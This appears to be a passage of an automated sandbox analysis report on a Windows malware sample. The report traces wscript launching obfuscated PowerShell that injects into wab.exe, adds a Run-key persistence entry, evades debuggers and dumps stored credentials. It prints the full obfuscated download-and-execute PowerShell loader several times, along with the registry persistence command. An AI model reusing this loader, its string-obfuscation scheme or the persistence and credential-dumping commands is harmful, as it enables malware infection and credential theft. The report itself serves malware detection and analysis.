Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4878	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5855	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3864	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1920	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API coverage: 9.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep count: 5855 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep count: 3864 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7468	Thread sleep count: 1920 > 30	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 1920 delay: -5

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_22B210F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,	10_2_22B26580
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,	19_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	21_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	22_2_00407898

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00418981 memset,GetSystemInfo,

19_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH%V%SystemRoot%\system32\mswsock.dll
Source: wab.exe, 0000000A.00000002.2246278943.0000000000558000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWz
Source: wscript.exe, 00000000.00000003.1329861249.000001C22DBA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: me ServerGoogle Chrome Elevation Service (GoogleChromeElevationService)Group Policy ClientGraphicsPerfSvcGoogle Update Service (gupdate)Google Update Service (gupdatem)Human Interface Device ServiceHV Host ServiceWindows Mobile Hotspot ServiceIKE and AuthIP IPsec Keying ModulesMicrosoft Store Install ServiceIP HelperIP Translation Configuration ServiceCNG Key IsolationKtmRm for Distributed Transaction CoordinatorServerWorkstationGeolocation ServiceWindows License Manager ServiceLink-Layer Topology Discovery MapperTCP/IP NetBIOS HelperLSMLanguage Experience ServiceDownloaded Maps ManagerMcpManagementServiceMicrosoft Edge Elevation Service (MicrosoftEdgeElevationService)Windows Mixed Reality OpenXR ServiceMozilla Maintenance ServiceWindows Defender FirewallDistributed Transaction CoordinatorMicrosoft iSCSI Initiator ServiceWindows InstallerMicrosoft Keyboard FilterNatural AuthenticationNetwork Connectivity AssistantNetwork Connection BrokerNetwork Connected Devices Auto-SetupNetlogonNetwork ConnectionsNetwork List ServiceNetSetupSvcNet.Tcp Port Sharing ServiceMicrosoft Passport ContainerMicrosoft PassportNetwork Location AwarenessNetwork Store Interface ServicePeer Networking Identity ManagerPeer Networking GroupingProgram Compatibility Assistant ServiceBranchCacheWindows Perception Simulation ServicePerformance Counter DLL HostPhone ServicePerformance Logs & AlertsPlug and PlayPNRP Machine Name Publication ServicePeer Name Resolution ProtocolIPsec Policy AgentPowerPrinter Extensions and NotificationsUser Profile ServiceWindows PushToInstall ServiceQuality Windows Audio Video ExperienceRemote Access Auto Connection ManagerRemote Access Connection ManagerRouting and Remote AccessRemote RegistryRetail Demo ServiceRadio Management ServiceRPC Endpoint MapperRemote Procedure Call (RPC) LocatorRemote Procedure Call (RPC)Security Accounts ManagerSmart CardSmart Card Device Enumeration ServiceTask SchedulerSmart Card Removal PolicyWindows BackupSecondary Log-onWindows Security ServicePayments and NFC/SE ManagerSystem Event Notification ServiceWindows Defender Advanced Threat Protection ServiceSensor Data ServiceSensor ServiceSensor Monitoring ServiceRemote Desktop ConfigurationSystem Guard Runtime Monitor BrokerInternet Connection Sharing (ICS)Spatial Data ServiceShell Hardware DetectionShared PC Account ManagerMicrosoft Storage Spaces SMPMicrosoft Windows SMS Router Service.SNMP TrapWindows Perception ServicePrint SpoolerSoftware ProtectionSSDP DiscoveryOpenSSH Authentication AgentSecure Socket Tunneling Protocol ServiceState Repository ServiceWindows Image Acquisition (WIA)Storage ServiceSpot VerifierMicrosoft Software Shadow Copy ProviderSysMainSystem Events BrokerTouch Keyboard and Handwriting Panel ServiceTelephonyRemote Desktop ServicesThemesStorage Tiers ManagementTime BrokerWeb Account ManagerDistributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhvB999.tmp.19.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: powershell.exe, 00000002.00000002.2065998160.00000137B1270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_04819AD9 LdrInitializeThunk,

5_2_04819AD9

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_22B22639

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

19_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

19_2_004044A4

Contains functionality to read the PEB

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B24AB4 mov eax, dword ptr fs:[00000030h]

10_2_22B24AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B2724E GetProcessHeap,

10_2_22B2724E

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_22B22639
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B22B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_22B22B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_22B260E2

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7548.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A80000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: FFDCC			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, 